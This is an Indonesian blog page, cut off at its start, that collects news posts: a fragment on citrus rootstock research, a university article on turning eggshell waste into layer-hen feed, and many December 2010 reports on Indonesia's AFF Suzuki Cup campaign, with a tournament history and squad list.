Perunutan basa DNA sekuen-sekuen baku (conserve), seperti ribosom 16S untuk jasad prokariot atau ribosom 18S untuk jasad eukariot, gena mikrosatetelit pada bakteri dan jamur, atau gena mantel protein pada kelompok virus, dapat digunakan untuk identifikasi jasad yang tidak bisa dikulturkan pada medium buatan.

Seleksi dan perakitan terhadap jenis/kultivar jeruk di Indonesia, menurutnya, harus segera ditingkatkan, terlebih dengan semakin meluasnya penyakit HLB yang sulit dikendalikan.

Jenis/kultivar jeruk yang pertumbuhannya cepat dengan kebugaran yang tinggi akan mampu berkompetisi dengan perkembangan Las yang relatif lambat di dalam jaringan inang.

"Kombinasi batang bawah dengan jeruk-jeruk mandarin/tangerine sebagai batang atas yang dilakukan secara in vitro di Faperta UGM menunjukkan ada batang bawah yang lebih menjanjikan untuk mengganti jenis batang bawah Rough Lemon (RL) dan Citrus Junos (CJ) yang selama ini selalu digunakan di Indonesia," terangnya.(rhs)


Cangkang Telur Ternyata Bisa Jadi Pakan Ternak!

YOGYAKARTA - Selama ini potensi limbah kerabang (cangkang) telur di Indonesia cukup besar. Sayangnya, potensi tersebut hingga saat ini belum dimanfaatkan secara optimal khususnya sebagai pakan unggas dan hanya dimanfaatkan untuk hiasan kerajinan.

Hal ini disebabkan karena sejauh ini limbah tersebut mudah terkontaminasi mikrobia dan kecernaan mineral kalsiumnya yang masih rendah. Disamping itu, keberadaanya dapat menyebabkan pencemaran lingkungan karena sulit didegradasi oleh mikrobia tanah.

Terkait dengan limbah kerabang telur tersebut Prof. Dr. Ir. Tri Yuwanta, SU, DEA, yang juga Dekan Fakultas Peternakan UGM, telah berhasil mengembangkan metode prosesing limbah kerabang telur menjadi pakan sumber mineral ayam petelur.

Metodenya yang dipergunakan dalam prosesing limbah kerabang telur tersebut, diawali dengan perendaman kerabang telur dengan air panas 80º celcius selama 15-30 menit, dibersihkan, lalu dikeringkan. Kemudian direndam lagi menggunakan asam fosfat dengan beberapa konsentrasi, setelah itu dibuat tepung. Setelah jadi tepung, kemudian dicampur dengan bahan baku pakan lain seperti jagung giling, bekatul, bungkil kedelai dan lain-lain.

“Metode prosesing limbah kerabang telur menjadi pakan sumber mineral ayam petelur ini sudah mulai dikembangkan,” papar Ahmad Rois Mansur, mahasiswa Fakultas Peternakan, Program Studi Ilmu dan Industri Peternakan 2007, yang juga terlibat dalam penelitian tersebut, Rabu (3/10/2010).

Pemanfaatan limbah kerabang telur ini imbuh Mansur merupakan salah satu upaya untuk memperkaya nutrien mineral pakan untuk ayam petelur. Kerabang telur menyusun sekitar 10 persen dari total berat telur. Kerabang telur sebagian besar (98,4 persen) terdiri dari bahan kering dan hanya 1,6 persen air. Kerabang telur mengandung 95,1 persen mineral dan 3,3 persen protein.

“Di antara mineral tersebut yang paling banyak adalah kalsium karbonat (98,43 persen), magnesium karbonat (0,84 persen) dan kalsium fosfat sebanyak 0,75 persen,” katanya.

Sebagai gambaran, produksi telur ayam ras nasional pada 2009 sebesar 1.071.398 ton. Jika rata-rata berat telurnya 60 gram maka kerabang telur yang dihasilkan dalam setahun adalah 178.566,33 ton. Berat itu setara dengan 175.762,84 ton kalsium karbonat, 1.499,96 ton magnesium karbonat dan 1.339,25 ton kalsium fosfat.

Dia menegaskan, biaya produksi tepung kerabang telur (untuk 100 kg) diperkirakan sebesar Rp89.000. Jadi, harga pembuatan tepung kerabang telur per kgnya adalah Rp890 sedangkan harga sumber mineral yang juga sering digunakan yaitu tepung kerang berharga Rp2.500 per kg (selisih Rp 1.610).

“Rata-rata konsumsi pakan ayam petelur per hari adalah 100 gram per ekor per hari dengan penggunaan tepung kerabang telur per harinya 3 gram (3 persen dari total pakan), maka biaya produksi per hari yang dapat dihemat adalah sebesar Rp48.300,00 per hari pada populasi ayam 10 ribu ekor atau Rp1,449 juta per bulan,” kata Mansur yang bersama timnya menjadi juara II dalam 2nd SATU Student Business Plan Competition di National Cheng Kung University Taiwan belum lama ini.

Lebih jauh Mansur menguraikan, ayam yang diberi kerabang telur sebagai sumber mineral mampu mencapai produksi 76,2 persen sedangkan dengan suplemen mineral lain sebesar 71,1 persen (selisih 5,1 persen). Sehingga pada peternakan ayam petelur yang memiliki populasi sebesar 10.000 ekor akan menghasilkan telur 510 butir lebih banyak (setara dengan 30,6 kg).

Jika harga 1 kg telur Rp12 ribu maka keuntungan yang bisa diperoleh adalah Rp367,2 ribu per hari atau Rp11,01 juta per bulan. Asumsi rata-rata berat telurnya 60 gram. Sehingga keuntungan total per bulan yang bisa diperoleh baik dari efisiensi pembuatan pakan maupun penjualan telur adalah Rp12,465 juta.

“Semakin besar skala usaha atau semakin banyak populasi ayam maka keuntungan yang diperoleh juga akan semakin banyak. Selain keuntungan finansial yang bisa diperoleh, suplementasi mineral menggunakan tepung kerabang telur juga dapat mendukung program ramah lingkungan,”


AFC Cup 2010 Home-Away, Semifinal Tetap di Senayan

JAKARTA - Indonesia dipastikan menggelar dua laga semifinal AFF Suzuki Cup 2010, dimana pasukan Garuda Merah Putih akan berhadapan dengan Filipina. Demikian seperti dilansir situs resmi AFF. Kamis (9/12/2010).

Sebelumnya, AFF sudah menyatakan tak satupun stadion di Filipina yang memenuhi standar untuk AFF Suzuki Cup. Pihak Federasi Sepakbola Filipina sepakat menggelar satu laga di tempat netral atau keduanya di kandang rival.

Dalam rilis terbarunya, AFF mencantumkan nama Stadion Gelora Bung Koarno (SUGBK) Senayan, Jakarta, sebagai venue dua laga semifinal antara Indonesia vs Filipina. Laga pertama akan berlangsung pada Kamis, 16 Desember, dan yang kedua pada Minggu, 19 Desember. Keduanya dijadwalkan kick-off tepat pada pukul 19.00 WIB.

Sementara itu, laga semifinal lainnya, yakni antara juara Grup B yang juga tuan rumah Vietnam dengan runner-up Grup A Malaysia, akan digelar perdana di Stadion Bukit Jalil, Kuala Lumpur, pada 15 Desember, dan partai penentuan di Stadion My Dinh, Hanoi, pada 18 Desember.

Pemenang yang berhak meraih tiket ke final akan bertarung memperebutkan trofi, juga dengan sistem home-away, pada 26 dan 29 Desember mendatang. (far)


Filipina Tak Bisa Gelar Semifinal

KUALA LUMPUR – Federasi Sepakbola ASEAN (AFF) menyatakan dalam siaran persnya, Rabu (8/12/2010), bahwa di Filipina tidak terdapat stadion yang dinilai memenuhi persyaratan untuk menggelar laga semifinal AFF Suzuki Cup 2010.

Berarti, runner-up dari Grup B Filipina yang akan berhadapan dengan timnas Indonesia sebagai juara Grup A AFF Suzuki Cup 2010 menghadapi masalah. Filipina tidak dapat melangsungkan pertandingan pada leg pertama di negaranya.

Seperti diketahui, laga semifinal dipertandingkan dua kali secara kandang dan tandang (home-away). Laga pertama sedianya dimainkan di Filipina, Kamis (16/12/2010) pekan depan. Sedangkan leg kedua dijadwalkan berlangsung di Stadion Gelora Bung Karno, Senayan, Jakarta, Minggu (19/12/2010).

AFF menyebutkan bahwa Filipina tidak dapat melangsungkan pertandingan semifinal maupun (berikutnya) final sebagai tuan rumah sebab tak ada stadion yang memenuhi standar untuk AFF Suzuki Cup 2010.

AFF menyatakan telah mengambil keputusan dengan pertimbangan seksama dan melakukan pembicaraan dengan pihak-pihak terkait. Satu set panduan yang diatur dalam “Kewajiban Penyenggaraan Turnamen” harus dipenuhi lebih dulu oleh pihak calon tuan rumah sebelum sebuah stadion dinyatakan mencapai standar kelayakan untuk menggelar AFF Suzuki Cup.

Karena, faktanya, tidak ada stadion di Filipina yang memenuhi syarat tersebut, Federasi Sepakbola Filipina setuju bila mereka diizinkan untuk memilih bertanding satu kali di tempat netral atau dua-duanya pertandingan (home-away) dilakukan di negara yang akan jadi lawan di semifinal.

Kepada Filipina, AFF mengucapkan selamat atas keberhasilan mencapai semifinal untuk pertama kalinya.
(zwr)


Indonesia Bersua Filipina

HANOI – Langkah Timnas Indonesia di turnamen AFF Cup 2010, akan dilanjutkan dengan bertemu Filipina di babak semifinal, 16 Desember mendatang. Indonesia akan lebih dulu bertandang ke markas Filipina.

Filipina melaju ke empat besar usai bermain 0-0 melawan Myanmar, Rabu (8/12/2010). Sementara pertandingan semifinal lainnya akan mempertemukan Vietnam sebagai juara Grup B, dengan Malaysia yang berstatus runner-up Grup A.

Indonesia sendiri berstatus juara Grup A, dengan mencatat hasil meyakinkan atau menyapu bersih semua kemenangan di babak penyisihan grup. Firman Utina dkk, mencetak 13 gol dan hanya kebobolan dua gol.

Indonesia dan Filipina relatif tidak banyak bertemu dalam satu dekade terakhir. Namun, Timnas Merah Putih harus mewaspadai kekuatan Filipina yang kini dilatih Steve McMenemy. Filipina mengandalkan sembilan pemain naturalisasinya sebagai modal belaga di AFF Cup 2010.
(zwr)


Rabu, 08 Desember 2010

Riedl Intip Kekuatan Calon Lawan di Semifinal

JAKARTA – Indonesia sudah memastikan satu tempat di semifinal AFF Cup 2010, setelah menasbihkan diri sebagai juara Grup A, dengan perolehan poin sempurna dari tiga pertandingan.

Tapi, siapakah lawan yang akan dihadapi Indonesia belum diketahui setelah laga pamungkas Grup B, baru akan digelar besok, Rabu (8/12/2010). Melihat kondisi ini, pelati Alfred Riedl tidak mau berdiam diri menunggu. Riedl memutuskan untuk memantau langsung kekuatan calon lawan yang akan dihadapi tim asuhannya.

Pelatih asal Austria ini akan terbang ke Vietnam untuk menyaksikan pertandingan terakhir babak penyisihan Grup B.

"Besok, saya akan berangkat ke Vietnam bersama Tuan Harhara (Sutan Harhara). Tujuan saya ke sana adalah untuk memantau pertandingan lawan yang akan kami hadapi," jelas Riedl dalam jumpa pers seusai pertandingan, Selasa (7/12/2010).

Laga terakhir Grup B mempertemukan Myanmar melawan Filipina dan Vietnam menghadapi Singapura. Filipina dan Singapura sama-sama mengantongi poin empat sementara Vietnam memiliki poin tiga.


Indonesia Tatap Serius Semifinal

JAKARTA – Indonesia sudah mengantongi satu tiket ke babak semifinal AFF Cup 2010, dengan menjadi juara Grup A. Kendati mendapatkan tiga kemenangan dari tiga laga penyisihan grup, pelatih Alfred Riedl tidak mau larut dalam euphoria kegembiraan.

Indonesia mencatat hasil luar biasa di babak penyisihan Grup A. Tim Merah Putih punya statistik meyakinkan dengan mencetak 13 gol dan kebobolan dua gol. Kemenangan terakhir dicatat atas musuh bebuyutan, Thailand.

Usai menang 2-1 atas Thailand, Riedl sudah punya agenda rencana persiapan timnya dalam menghadapi semifinal.

"Besok jam 11 pagi masih ada latihan. Tapi, untuk pemain yang hari ini bermain penuh akan diberikan waktu istirahat. Lusa pemain libur latihan dan kembali berlatih Jumat sampai tanggal 14 Desember. Setelah itu kita berangkat ke luar negeri menghadapi semifinal," ujar Riedl dalam konferensi pers seusai pertandingan, Selasa (7/12/2010).

Tentang siapa yang akan dihadapi di semifinal, Indonesia memang belum mendapatkan lawan karena laga terakhir penyisihan Grup B baru digelar besok. Pertandingan semifinal sendiri akan berlangsung pada 16 dan 19 Desember. Indonesia akan lebih dulu melakoni laga tandang.


Bachdim: Indonesia Harus ke Final!

JAKARTA - Irfan Bachdim menyambut gembira kemenangan 2-1 Timnas Indonesia atas Thailand. Striker naturalisasi inipun menyimpan tekad membawa Garuda Merah Putih hingga ke final.

Ya, kemenangan di laga pamungkas penyisihan Grup A AFF Suzuki Cup 2010 di Stadion Gelora Bung Karno (SUGBK) Senayan, Jakarta, Selasa (7/12/2010) malam tadi, memuluskan langkah Indonesia sebagai juara grup sekaligus melaju ke semifinal. Enam poin dalam dua laga sebelumnya diraih Firman Utina dkk saat ‘mengganyang’ Malaysia 5-1 dan mencukur Laos 6-0.

Sementara ini, skuad arahan Alfred Riedl masih menunggu hasil laga terakhir di Grup B guna menentukan lawan di semifinal. Saat ditanya harapan di laga selanjutnya, Bachdim dengan tegas menjawab Indonesia harus menang dan melaju ke partai pamungkas.

“Kami harus menang!” cetus Bachdim, ditemui usai pertandingan. “Kalau untuk target pribadi tidak ada,” lanjutnya, ketika ditanya apakah striker 22 tahun berniat menambah torehan golnya.

Sebelumnya, Oktovianus Maniani terlihat pincang saat menuju keluar stadion. Winger asal Papua mengaku sedang dilanda cedera, sehingga performanya malam tadi dirasa kurang maksimal. “Cedera betis kanan dari sebelum pertandingan,” jawabnya singkat.

Sedangkan Markus Haris Maulana enggan menunjuk siapa runner-up Grup B yang akan menjadi lawan di semifinal. “Terserah saja,” ujar kiper milik Persib Bandung, sambil berlalu meninggalkan wartawan yang sebenarnya ingin bertanya lebih jauh.


Terbanglah Tinggi, Garuda Bangsa ku


HASIL fantastis diperoleh Timnas Indonesia sepanjang babak penyisihan Grup A, AFF Suzuki Cup 2010. Kini, mampukah skuad Garuda menancapkan kukunya untuk mencatat sejarah baru dengan merebut trofi juara untuk pertama kalinya?

Jika melihat performa Firman Utina dkk sepanjang babak penyisihan grup, Indonesia memang berpeluang besar untuk bisa mengakhiri catatan buruk sepanjang enam perhelatan AFF Cup (dulunya Piala Tiger). Bagaimana tidak, merah putih melewati fase grup dengan sempurna.

Tiga kali main, skuad besutan Alfred Riedl sukses mengakhirinya dengan kemenangan. Negara tetangga Malaysia menjadi korban pertama yang ‘diganyang’ 5-1. Di laga kedua, Laos yang mengalahkan Indonesia 0-2 di Sea Games tahun lalu juga tak bisa berkutik. Dua gol kapten tim Firman Utina mengantar Indonesia melakukan pembalasan sempurna dengan memberondong setengah lusin gol tanpa mampu dibalas.

Terkini, malam tadi Indonesia kembali menunjukkan diri sebagai calon kuat juara dengan menundukkan kolektor tiga kali juara Thailand dengan skor 2-1, setelah sebelumnya sempat tertinggal 0-1. Hasil ini memaksa negeri ‘Gajah Putih’ yang sebelumnya digadang-gadang bakal keluar sebagai juara justru harus terkapar di penyisihan grup. Kemenangan ini juga merupakan sejarah baru bagi persepakbolaan Indonesia yang belum pernah menang atas Thailand.

Dengan mengoleksi poin maksimum, sembilan angka, Indonesia melaju mulus ke semifinal didampingi Malaysia. Hebatnya, kegemilangan laskar merah putih juga dibarengi dengan penampilan solid baik saat bertahan maupun menyerang. Ini dibuktikan dengan catatan statistik dimana Indonesia mampu mencetak 13 gol dan hanya kebobolan dua gol.

Torehan prestasi Indonesia kali ini jelas memberikan kebanggaan tersendiri bagi masyarakat Indonesia khususnya para pecinta sepak bola. Ini terbukti dengan terus meningkatnya jumlah dukungan fans yang datang langsung ke Stadion Utama Gelora Bung Karno (SUGBK). Jika di pertandingan pertama, Indonesia hanya didukung sekira 30.000 fans, di laga terakhir jumlahnya meningkat dua kali lipat hingga menembus angka 65.000 fans.

Selain berkat performa solid dan kerja sama apik para pemain di lapangan, serta dukungan penuh supporter, hasil ini juga tak lepas dari peran pelatih Alfred Riedl yang sukses memberikan warna baru dalam permainan timnas. Di era kepemimpinannya, arsitek asal Austria ini melakukan terobosan berani dengan mengubah paradigma timnas yang selama ini hanya mengandalkan para pemain seniornya.

Di tangan Riedl, para pemain muda mendapat kepercayaan penuh untuk bisa memberikan yang terbaik untuk bangsa. Nama-nama baru yang sebelumnya tak pernah terdengar seperti Zulkifli Syukur, M. Nasuha (bek sayap), Ahmad Bustomi hingga Oktovianus Maniani sukses menggantikan peran para seniornya. Dengan kombinasi pemain muda dan senior, kini Indonesia menjelma sebagai kekuatan baru di Asia Tenggara.

Selain faktor di atas, dukungan pemerintah yang memberikan kesempatan kepada timnas untuk melakukan naturalisasi juga pantas mendapat aplaus tersendiri. Bagaimana tidak, masuknya dua pemain blasteran di tim, yakni Christian ‘El Loco’ Gonzales dan idola baru Irfan Bachdim sukses memberi warna tersendiri dalam permainan tim.

Ya, duet El Loco dan Bachdim di lini depan membuat lawan-lawan Indonesia di babak penyisihan grup seakan buta dengan kekuatan Indonesia. Alhasil keduanya pun sukses memberikan sumbangsih maksimal untuk tim. Dari tiga laga, Bachdim sukses melesakkan dua gol, masing-masing saat melawan Malaysia dan Laos.

Sementara El Loco, bomber veteran dari tim Persib Bandung sukses menyarangkan satu gol. Tak hanya gol, bomber 34 tahun ini juga rajin memberikan ‘assist’ yang berujung gol. Bukti konkritnya adalah pergerakannya di kotak penalti yang memaksa pemain Thailand melakukan pelanggaran dan berujung penalti yang dieksekusi dengan dingin Bambang Pamungkas untuk membawa Indonesia menyamakan kedudukan saat melawan Thailand. Hal serupa juga sempat dilakukan El Loco saat bersua Laos di pertandingan sebelumnya.

Nah, dengan komposisi tim yang seimbang, Indonesia tentunya berpeluang besar mengakhiri rasa penasaran mereka dalam delapan kali perhelatan AFF Cup, dengan memeluk trofi juara. Seperti diketahui, sepanjang perhelatan ajang dua tahunan tersebut, pencapaian maksimal skuad Garuda hanya tiga kali menjadi finalis. Inilah momen tepat untuk menandai kebangkitan sepak bola Indonesia yang dahulu sempat dikenal dengan sebutan ‘Macan Asia’. So, terbanglah tinggi Garuda ku! (acf)


Selasa, 07 Desember 2010

SBY pun Bersorak Lihat Gol Bambang Pamungkas


"Alhamdulillah kita menang dan belum terkalahkan. Tetap semangat," kata SBY.
Bambang Pamungkas menjadi pahlawan kemenangan Indonesia saat menghadapi Thailand pada penyisihan Grup A Piala AFF, Selasa 7 Desember 2010. Dua golnya dari titik penalti mengantar kemenangan 2-1 Indonesia di Stadion Utama Gelora Bung Karno, Senayan, Jakarta.

Laga ini juga turut disaksikan Presiden Susilo Bambang Yudhoyono melalui TV layar lebar di Istana Tampak Siring, Bali. Didampingi Ibu Negara Ani Yudhoyono, Menpora Andi Mallarangeng, serta para menteri Kabinet Indonesia Bersatu II, SBY ikut bertepuk tangan begitu peluit panjang dibunyikan.

"Alhamdulillah kita menang dan belum terkalahkan. Tetap semangat," kata SBY seperti dikutip situs resmi Kemenpora selepas pertandingan.

Sebelum kick off, Menpora memberi kata sambutan soal rekam jejak Indonesia selama penyisihan Grup A Piala AFF. Termasuk soal kemenangan sensasional 5-1 atas Malaysia dan 6-0 atas Laos. Ketika akhirnya Indonesia memastikan satu kemenangan lagi, Menpora kembali menyuarakan target jadi juara Piala AFF untuk pertama kalinya.

"Kita harapkan mudah-mudahan anak-anak (timnas) bisa masuk final dan menjuarai kejuraan ini. Kami terharu dan bangga, kita sudah lapar prestasi," kata Menpora lagi.

Hadir dalam acara nonbar itu antara lain Menko Polhukam Djoko Suyanto, Menko Perekonomian Hatta Rajasa, Mensesneg Sudi Silalahi, Panglima TNI Jenderal Agus Suhartono, Kapolri Jenderal Pol. Timur Pradopo, dan Seskab Dipo Alam.
• VIVAnews


Bachdim Puji Bepe Sebagai 'Legenda'

VIVAnews - Indonesia sukses menggulung Thailand 2-1 di pertandingan terakhir penyisihan Grup A Piala AFF, Selasa 7 Desember 2010. Dua gol Indonesia diborong oleh Bambang Pamungkas dari titik penalti di menit 81 dan 89.

Bepe -sapaannya- turun sebagai cadangan dan baru merumput di menit 59 menggantikan Irfan Haarys Bachdim. Dua gol itu membuat koleksi gol Bepe di timnas bertambah jadi 34. Tak salah jika kemudian, pujian datang dari sesama rekan-rekannya di timnas. Termasuk Irfan Bachdim, pemain muda yang selama ini menggeser posisinya di starting line up tim Merah Putih.

"Hanya ada satu orang, satu pahlawan, satu legenda. Namanya Bambang Pamungkas," kata Bachdim dalam time line Twitternya beberapa jam selepas pertandingan di Stadioan Utama Gelora Bung Karno, Senayan, Jakarta.

Bepe sendiri langsung jadi trending topic, bukan cuma di Indonesia tapi dunia. Selain nama Bepe, nama Arif Suyono turut meledak masuk dalam urutan keenam di trending topic, Selasa malam.

Sayangnya Bepe yang jadi buah bibir malam itu masih saja pelit mengeluarkan pernyataan. Selepas pertandingan, Bepe langsung ngeloyor dari arena Mixed Zone yang memang diperuntukkan untuk sesi wawancara antara pemain dengan juru warta. Dibantu pengawalan rekan-rekannya, striker Persija Jakarta ini meninggalkan para wartawan tanpa sepatah kata pun.
• VIVAnews


Timnas Indonesia Diganjar Bonus Rp500 Juta Ini bagian dari 'cicilan' bonus Rp 2,5 miliar.


VIVAnews - Sukses lolos ke semifinal Piala AFF 2010, punggawa tim nasional Indonesia mulai kecipratan bonus. Bonus lebih besar menanti jika lolos ke final dan menjadi juara.

Menurut situs PSSI, Tim Merah Putih telah mendapatkan bonus Rp500 juta. Ini bagian dari 'cicilan' bonus Rp 2,5 miliar yang dijanjikan PSSI jika timnas Indonesia sukses lolos ke babak final Piala AFF.

Ketua Umum PSSI, Nurdin Halid menyebut juga akan menambah bonus Rp 3 miliar jika menjadi juara. Jadi, total bonus yang akan diterima Pasukan Garuda jika menjadi juara AFF untuk kali pertama yakni Rp5,5 miliar.

"Sekarang ini kita baru setengah jalan," kata Nurdin seusai memberikan dukungan kepada timnas di SUGBK Senayan, Jakarta, kemarin, sesuai dilansir situs PSSI.

Timnas Indonesia tampil gemilang pada tiga laga penyisihan Grup A dengan berturut-turut menaklukkan Malaysia 5-1, Laos 6-0, dan terakhir Thailand 2-1, Selasa 7 Desember 2010.

Menurut Nurdin, timnas Indonesia tetap harus mempersiapkan diri lebih baik lagi untuk menghadapi babak semifinal nanti. "Kita tak boleh lengah. Para pemain harus fokus menghadapi dua partai penting di babak semifinal itu, tidak usah terlalu larut dalam euforia kemenangan," tegas Nurdin.

Indonesia menjadi satu-satunya tim yang meraih poin sempurna, 9, di antara delapan tim peserta penyisihan Piala AFF 2010. Dari dua laga di Grup B, tak ada tim yang mampu terus meraih kemenangan.

Sebagai juara Grup A, Indonesia akan menghadapi runner up Grup B. Tiga negara: Filipina, Singapura dan Vietnam potensial menjadi calon lawan Indonesia.

Laga terakhir Grup B akan digelar nanti malam di Vietnam. Tuan rumah Vietnam akan melawan Singapura, dan Filipian bersua Myanmar.
• VIVAnews


SEJARAH TIMNAS DI PIALA AFF ATAU YANG DULU DI SEBUT PIALA TIGER


Sempat Ternoda 'Sepak Bola Gajah'
Sejak ikut ambil bagian di Piala AFF 1996, Indonesia belum pernah meraih gelar juara.
VIVAnews - Indonesia sudah ambil bagian sejak Piala AFF digulirkan pertama kali, 1996. Saat itu, even yang diikuti oleh negara-negara dari Asia Tenggara ini lebih dikenal dengan nama Piala Tiger.

Sejak penampilan perdananya, Indonesia belum sekalipun mampu merebut gelar juara. Sebaliknya, sepakbola Indonesia sempat tercoreng oleh aksi tidak sportif yang ditunjukkan para pemain di lapangan saat tampil di Piala Tiger 1998. Berikut kilas balik perjalan timnas di Piala AFF.

1996
Piala AFF digelar pertama kali di Singapura, 2-13 September 1996. Karena disponsori oleh Tiger Beer, even ini akhirnya dikenal dengan sebutan Piala Tiger. Thailand berhasil merebut gelar juara setelah mengalahkan Malaysia di final dengan skor tipis 1-0. Indonesia berada di peringkat keempat setelah dikalahkan Vietnam 2-3.

1998
Piala Tiger kedua digelar di Vietnam 27 Agustus-5 September 2008. Bukan prestasi yang diraih Indonesia pada perhelatan kali ini, tapi cerita buruk yang dibawa pulang oleh Aji Santoso cs. Karena ingin menghindari tuan rumah Vietnam di babak semifinal, Thailand dan Indonesia bermain 'sepakbola gajah'. Kedua tim sama-sama menghindari kemenangan.

Skor 2-2 bertahan cukup lama. Namun dipenghujung babak kedua, pemain belakang Indonesia, Musrsyid Effendi dengan sengaja memasukkan bola ke gawang Thailand. Skor pun berubah menjadi 2-3 untuk kekalahan Indonesia.

Akibat aksi tersebut, Indonesia dan Thailand dikenai denda karena telah merusah semangat sepakbola. Musrsyid sendiri dihukum tak boleh tampil di even internasional seumur hidup.

Di tubuh PSSI, Azwar Anas yang menduduki kursi pimpinan memilih mundur. Dia digantikan oleh Agum Gumelar.

Singapura akhirnya keluar sebagai juara untuk pertama kali setelah di final mengalahkan tuan rumah, Vietnam dengan skor 1-0. Sedangkan Indonesia harus puas di tempat ketiga mengalahkan Thailand lewat drama adu penalti, 5-4. Sepanjang 120 menit kedua tim bermain imbang 3-3.

2000
Thailand mendapat kesempatan menjadi tuan rumah Piala Tiger. Tampil di hadapan publik sendiri tak ingin disia-siakan tim Thailand. Tim Negeri Gajah Putih itu akhirnya sukses merebut gelar juara untuk kedua kali setelah mengalahkan Indonesia di final dengan skor cukup telak 4-1.

2002
Tekad untuk menjuarai Piala Tiger mencapai puncaknya pada tahun ini. Indonesia yang tampil sebagai tuan rumah ingin merebut trofi juara dari tangan Thailand. Namun, harapan publik tanah air akhirnya pupus setelah di babak final yang digelar di Stadion Utama Gelora Bung Karno (SUGBK), 29 Desember 2002, Indonesia kembali tumbang di kaki tim Thailand.

Setelah bermain imbang 2-2 sepanjang dua babak, Indonesia kalah pada saat drama adu penalti.

2004
Untuk pertama kalinya babak penyisihan Piala Tiger digelar di dua negara. Grup A digelar di Vietnam, sedangkan Grup B digelar di Malaysia. Setelah babak penyisihan, pertandingan selanjutnya dijalankan dengan format home and away.

Peserta baru juga muncul di Piala Tiger tahun ini. Timor Leste yang resmi berpisah dari Republik Indonesia bergabung di Grup B bersama Thailand, Filipina, Malaysia dan Myanmar.

Indonesia juga turun dengan muka baru. Pelatih asal Inggris, Peter Withe yang sukses membawa Thailand merebut dua gelar juara (200-2002) memutuskan pindah ke Indonesia.

Sayang, debut pertama Peter hanya mampu mengantar Indonesia ke posisi runner up saja. Di leg pertama babak final tuan rumah Singapura menekuk Indonesia dengan skor 2-1. Sedangkan saat bertandang ke Indonesia, Singapura justru unggul lebih telak, 3-1.

2007
Singapura kembali menjadi tuan rumah Piala AFF. Singapura yang sedang berniat lolos kualifikasi Piala Dunia 2022 mulai melakukan serangkaian naturalisasi terhadap pemain asing.

Pada even yang digelar 12 Januari-4 Februari 2007 itu, Singapura sudah diperkuat Agu Casmir (Nigeria), John Wilkinson (Inggris),dan Aleksander Duric (serbia).

Menjamu Thailand di leg pertama babak final, Singapura menang 2-1. Sedangkan di leg kedua Singapura berhasil menahan imbang tuan rumah Thailand 1-1 sekaligus memastikan gelar juara.

Indonesia sendiri tak bisa berbuat banyak. Langkah timnas terhenti di babak penyisihan. Ismed Sofyan hanya mampu menempati peringkat ketiga Grup B dengan total 5 poin.

2008
Tahun ini Piala AFF yang disponsori oleh Suzuki diikuti oleh 8 tim. Di grup A, Indonesia yang berstatus sebagai tuan rumah akan menghadapi Myanmar, Singapura, dan Kamboja. Sedangkan Thailand yang menjadi tuan rumah grup B bergabung bersama Vietnam, Malaysia, dan Laos. Tim Merah Putih yang saat ini diarsiteki oleh Benny Dollo bertekad untuk juara.

Pencetak Gol Terbanyak
1996-7 gol, Natipong Sritong-In (Thailand)
1998-4 gol, Myo Hlaing Win (Myanmar)
2000-5 gol, Gendut Dony Chrsitiawan (Indonesia) & Warrawoot Srimaka (Thailand)
2002-8 gol, Bambang Pamungkas (Indonesia)
2004, 7 gol, Ilham Jaya Kesuma (Indonesia)
2007, 10 gol, Mohd Noh Alam Shah (Singapura)

Sumber : LOC Piala AFF 2008


SKUAD TIMNAS INDONESIA DI PIALA AFF


Skuad (Daftar Pemain) Timnas Indonesia di Piala AFF 2010 sudah secara resmi diumumkan Badan Tim Nasional atau BTN, berisi 30 pemain dari berbagai klub di Indonesia Super League (ISL). 30 pemain ini nantinya akan dikerucutkan lagi menjadi 23 pemain sehari menjelang gelaran Piala AFF 2010 yang mulai berlangsung 1 Desember 2010.

Dari 30 nama pemain, ada beberapa muka baru yang sebelumnya tidak dipanggil dalam pelatnas. Mereka adalah Irfan Bachdim, Octavianus, M Roby, Hariono, Johan Juansah, Hamka Hamzah, dan Christian Gonzales (yang baru saja menyelesaikan proses naturalisasinya). Adapun Budi Sudarsono dikabarkan gagal tampil karena cedera, begitupun Boaz Salosa yang dicoret karena dinilai tidak profesional, telat bergabung ke Pelatnas dengan alasan keluarga, karena 2 anaknya sakit.

Berikut skuad timnas yang akan berlaga di Piala AFF 2010, skuad ideal terbaik Indonesia yang berisikan komposisi pemain senior dan junior ala pelatih Alfred Riedl.

Kiper: Markus Horison, Ferry Rotinsulu, Kurnia Meiga, Made Wirawan

Bek: Zulkifli, Benny Wahyudi, Ricardo Salampessy, Nova Arianto, Maman Abdulrahman, Hamka Hamzah, Yesaya Desnam, M Roby, M Nasuha, Slamet Riyadi
Gelandang: M Ridwan, Arif Suyono, Toni Sucipto, Firman Utina, Eka Ramdani, Ahmad Bustomi, Hariono, Johan Juansyah, Oktovianus Maniani, Octavianus

Penyerang: Christian Gonzales, Irfan Bachdim, Bambang Pamungkas, Yongky Aribowo, Dendi Santoso


Twitter Delicious Facebook Digg Favorites More